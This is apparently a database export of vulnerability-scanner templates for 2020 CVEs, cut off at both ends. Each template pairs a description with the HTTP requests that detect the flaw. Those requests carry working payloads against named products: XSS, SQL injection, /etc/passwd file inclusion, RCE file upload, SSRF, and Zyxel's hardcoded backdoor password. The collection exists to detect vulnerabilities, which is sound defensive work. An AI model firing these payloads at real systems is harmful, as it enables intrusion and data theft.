true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a0047304502210085ac18d58b25cda6f18fb57df5ee204220cce67dfd2d614ea043b10b5987195b02200ac8512718ee39d10cc0baed51f32d199ac3e7ef8c366405aa49af3e971df93b:922c64590222798bb761d5b6d8e72950", "hash": "eb325b25449ccdd58cde04433b8f5200", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fa" }, "name": "CVE-2020-28208.yaml", "content": "id: CVE-2020-28208\n\ninfo:\n name: Rocket.Chat <3.9.1 - Information Disclosure\n author: pdteam\n severity: medium\n description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability can lead to the exposure of sensitive information, such as user credentials or private conversations, potentially compromising the confidentiality of the system.\n remediation: |\n Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208).\n reference:\n - https://trovent.io/security-advisory-2010-01\n - https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt\n - http://www.openwall.com/lists/oss-security/2021/01/07/1\n - http://packetstormsecurity.com/files/160845/Rocket.Chat-3.7.1-Email-Address-Enumeration.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28208\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-28208\n cwe-id: CWE-203\n epss-score: 0.01197\n epss-percentile: 0.84869\n cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rocket.chat\n product: rocket.chat\n tags: cve,cve2020,packetstorm,rocketchat,rocket.chat\n\nhttp:\n - raw:\n - |\n POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/json\n\n {\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"result\\\":false'\n - '\"success\":true'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022048dc7f2955a7c8165a805ab421aa67f77e3dbbf8babf696b4c0b85a3d615efcb0220385a7cfa496fb6ae1edfd40595f13672069e6ed62c0b12c3ecfd17a44eca5e72:922c64590222798bb761d5b6d8e72950", "hash": "5ed5b8a70b7ebdf46c367497c443b9ae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fb" }, "name": "CVE-2020-28351.yaml", "content": "id: CVE-2020-28351\n\ninfo:\n name: Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability.\n reference:\n - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html\n - https://www.mitel.com/articles/what-happened-shoretel-products\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28351\n - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html\n - https://github.com/dievus/cve-2020-28351\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-28351\n cwe-id: CWE-79\n epss-score: 0.0036\n epss-percentile: 0.71646\n cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mitel\n product: shoretel_firmware\n tags: cve,cve2020,packetstorm,shoretel,xss,mitel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - 'Content-Type: text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100841aeaf06ae18374ceb5b6b14a6b0052577b9ddc7357154d071ed1c63f4cf12402204ae05b8c456dfca7ba53a4bf76033d75de18a70befd86e6437641a1c574c92e4:922c64590222798bb761d5b6d8e72950", "hash": "f234b14a8d96951f341c001da4c70641", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fc" }, "name": "CVE-2020-28871.yaml", "content": "id: CVE-2020-28871\n\ninfo:\n name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system.\n remediation: |\n Upgrade to a patched version of Monitorr or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/48980\n - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28871\n - http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html\n - http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-28871\n cwe-id: CWE-434\n epss-score: 0.96907\n epss-percentile: 0.99693\n cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: monitorr\n product: monitorr\n tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project\n\nhttp:\n - raw:\n - |\n POST /assets/php/upload.php HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: text/plain, */*; q=0.01\n Connection: close\n Accept-Language: en-US,en;q=0.5\n X-Requested-With: XMLHttpRequest\n Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\n Origin: http://{{Hostname}}\n Referer: http://{{Hostname}}\n\n -----------------------------31046105003900160576454225745\n Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\n Content-Type: image/gif\n\n GIF89a213213123\n\n -----------------------------31046105003900160576454225745--\n - |\n GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"d03c180355b797069cc047ff5606d689\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206d7e875ef689448d4fe81a02c406847d917a099c25b098a99ef1316ace5e8c08022100d60b0fa98c183d7f252ecb56b52dc4c78730673b6ed6cffa0013a8e863987a28:922c64590222798bb761d5b6d8e72950", "hash": "a445f869e1d5aaac2571635b8bd94963", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fd" }, "name": "CVE-2020-28976.yaml", "content": "id: CVE-2020-28976\n\ninfo:\n name: WordPress Canto 1.3.0 - Blind Server-Side Request Forgery\n author: LogicalHunter\n severity: medium\n description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.\n remediation: |\n Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/49189\n - https://www.canto.com/integrations/wordpress/\n - https://github.com/CantoDAM/Canto-Wordpress-Plugin\n - https://nvd.nist.gov/vuln/detail/CVE-2020-28976\n - http://packetstormsecurity.com/files/160358/WordPress-Canto-1.3.0-Server-Side-Request-Forgery.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-28976\n cwe-id: CWE-918\n epss-score: 0.00616\n epss-percentile: 0.78321\n cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: canto\n product: canto\n framework: wordpress\n tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/canto/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Canto'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}\"\n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}\"\n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"null\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d337b1a5e97c6aa8fb4bbf4b8a91c3a96475868420a2342fce292b449fe7bee1022100f35e3a1d0316e034d7743c0da40e7540645360cb88356751ac2f6855a3d0adf5:922c64590222798bb761d5b6d8e72950", "hash": "f643279c6cba59c5b61052fdd7673535", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081fe" }, "name": "CVE-2020-29164.yaml", "content": "id: CVE-2020-29164\n\ninfo:\n name: PacsOne Server <7.1.1 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability.\n reference:\n - https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d\n - https://pacsone.net/download.htm\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29164\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-29164\n cwe-id: CWE-79\n epss-score: 0.00205\n epss-percentile: 0.5782\n cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rainbowfishsoftware\n product: pacsone_server\n tags: cve,cve2020,pacsone,xss,rainbowfishsoftware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - '1'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100eef3cee9242d0faa4d39283bfb69171f37df3516899ca083fcabad8c7f4cdcb70221008f958e6457bea7a1c342e6b6efc6c8e6a23e3e42c6f0a677925b842c310e06e6:922c64590222798bb761d5b6d8e72950", "hash": "7d49d21faa4328111f669278c1d52ba3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ff" }, "name": "CVE-2020-29227.yaml", "content": "id: CVE-2020-29227\n\ninfo:\n name: Car Rental Management System 1.0 - Local File Inclusion\n author: daffainfo\n severity: critical\n description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the \"page\" parameter, leading to code execution.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0.\n reference:\n - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29227\n - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29227\n epss-score: 0.01122\n epss-percentile: 0.83087\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n tags: cve,cve2020,lfi,car_rental_management_system_project,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?page=/etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210087e6438b7ef91ed9ace5b21965669d3e02629d42a780db4c203d43f6c7e9994102202503aaac6e263ea1eb468d45732cc06a390e660c0e0cf3c6656daf03a4773b3c:922c64590222798bb761d5b6d8e72950", "hash": "582f938b3dba1c7143bcb1785b5ab263", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308200" }, "name": "CVE-2020-29284.yaml", "content": "id: CVE-2020-29284\n\ninfo:\n name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0.\n reference:\n - https://www.exploit-db.com/exploits/48984\n - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip\n - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29284\n - https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29284\n cwe-id: CWE-89\n epss-score: 0.06718\n epss-percentile: 0.93156\n cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: multi_restaurant_table_reservation_system_project\n product: multi_restaurant_table_reservation_system\n tags: cve,cve2020,tablereservation,sqli,unauth,edb,multi_restaurant_table_reservation_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n\n - type: word\n part: body\n words:\n - \"Restaurent Tables\"\n - \"Chair List\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022077b1c5498dae902e0ad7e7405b7d959c4faf796f270db4dc8ad70f78d13f8abd0221009a4e7d605a8b99d9957f179e9e090b48217d6acde1a09be14427c5a9ceadc952:922c64590222798bb761d5b6d8e72950", "hash": "e00f30c831877928c9db1a5e9bf20198", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308201" }, "name": "CVE-2020-29395.yaml", "content": "id: CVE-2020-29395\n\ninfo:\n name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability.\n reference:\n - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS\n - https://www.myeventon.com/news/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29395\n - http://packetstormsecurity.com/files/160282/WordPress-EventON-Calendar-3.0.5-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-29395\n cwe-id: CWE-79\n epss-score: 0.05489\n epss-percentile: 0.93026\n cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: myeventon\n product: eventon\n framework: wordpress\n tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/eventON/'\n\n - method: GET\n path:\n - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201a710f599e37ca84f4c5ce50b0de3c5b186ecb2e2cde5baa91a5c12c03034c4102204701cdfa4f09f39c53d5b5c108f3d652ba3f452608e7b4a10e86eb9f1b2cbf65:922c64590222798bb761d5b6d8e72950", "hash": "e0ffc8f8c2be3201744beae0d4a337c3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308202" }, "name": "CVE-2020-29453.yaml", "content": "id: CVE-2020-29453\n\ninfo:\n name: Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)\n author: dwisiswant0\n severity: medium\n description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\n impact: |\n An attacker can retrieve sensitive files containing configuration information, potentially leading to further exploitation or unauthorized access.\n remediation: |\n Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.\n reference:\n - https://jira.atlassian.com/browse/JRASERVER-72014\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29453\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-29453\n cwe-id: CWE-22\n epss-score: 0.01696\n epss-percentile: 0.86435\n cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: atlassian\n product: data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,atlassian,jira,lfi,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml\"\n - \"{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - com.atlassian.jira\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b410f0ca39281dc5ddeda5d50abe2a078b267a53057d75e940219cba5187674c022035420ad1aa885d5b61ffc9bfa986feda8ce2adf3ebb1502d4a548c7c9e2b5ec2:922c64590222798bb761d5b6d8e72950", "hash": "305b931a5deb7e6d5c4fd1d0fbb4c463", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308203" }, "name": "CVE-2020-29583.yaml", "content": "id: CVE-2020-29583\n\ninfo:\n name: ZyXel USG - Hardcoded Credentials\n author: canberbamber\n severity: critical\n description: |\n A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.\n remediation: |\n Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.\n reference:\n - https://www.zyxel.com/support/CVE-2020-29583.shtml\n - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29583\n - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html\n - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29583\n cwe-id: CWE-522\n epss-score: 0.96219\n epss-percentile: 0.99483\n cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: zyxel\n product: usg20-vpn_firmware\n shodan-query: title:\"USG FLEX 100\"\n tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev\n\nhttp:\n - raw:\n - |\n GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /ext-js/index.html HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - 'data-qtip=\"Web Console'\n - 'CLI'\n - 'Configuration\">'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950", "hash": "5bc6b68a1ee1e4d0626fa179ac26414e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308204" }, "name": "CVE-2020-29597.yaml", "content": "id: CVE-2020-29597\n\ninfo:\n name: IncomCMS 2.0 - Arbitrary File Upload\n author: princechaddha\n severity: critical\n description: |\n IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.\n remediation: |\n Apply the latest security patch or update to a version that addresses the vulnerability.\n reference:\n - https://github.com/Trhackno/CVE-2020-29597\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29597\n - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md\n - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html\n - https://github.com/trhacknon/CVE-2020-29597\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29597\n cwe-id: CWE-434\n epss-score: 0.78448\n epss-percentile: 0.9817\n cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: incomcms_project\n product: incomcms\n tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project\n\nhttp:\n - raw:\n - |\n POST /incom/modules/uploader/showcase/script.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n ------WebKitFormBoundaryBEJZt0IK73M2mAbt\n Content-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\n Content-Type: text/html\n\n {{randstr_2}}\n ------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n - |\n GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}'\n\n - type: word\n part: body_2\n words:\n - '{{randstr_2}}'\n# digest: 4a0a00473045022100ab5832fbca2af41f73d0a9dd5b7e6a5d11131ec0ef50cf26f0613d515b953718022046f83ee4202dafd7b1a1b379f116c6d1a31b1ebe1dc45a9e355c444f9e84e968:922c64590222798bb761d5b6d8e72950", "hash": "fb3c371ba2fe745a249589aec387695f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308205" }, "name": "CVE-2020-3187.yaml", "content": "id: CVE-2020-3187\n\ninfo:\n name: Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal\n author: KareemSe1im\n severity: critical\n description: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the affected system, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate the vulnerability.\n reference:\n - https://twitter.com/aboul3la/status/1286809567989575685\n - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43\n - https://nvd.nist.gov/vuln/detail/CVE-2020-3187\n - https://github.com/Threekiii/Awesome-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2020-3187\n cwe-id: CWE-22\n epss-score: 0.97297\n epss-percentile: 0.99857\n cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: firepower_threat_defense\n tags: cve,cve2020,cisco,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/+CSCOE+/session_password.html\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - webvpn\n - Webvpn\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b9abee5c6511698f97786ab8db734d9eb2863fe4212007059d4b777ba852ba8c022100d1336ba7f8555d17cc2c36c2a593c376a9b242d418b518cb295a0808617f4b80:922c64590222798bb761d5b6d8e72950", "hash": "56aea4a1cc68557d79d61091dcc983e2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308206" }, "name": "CVE-2020-3452.yaml", "content": "id: CVE-2020-3452\n\ninfo:\n name: Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion\n author: pdteam\n severity: high\n description: |\n Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to fix the vulnerability.\n reference:\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - 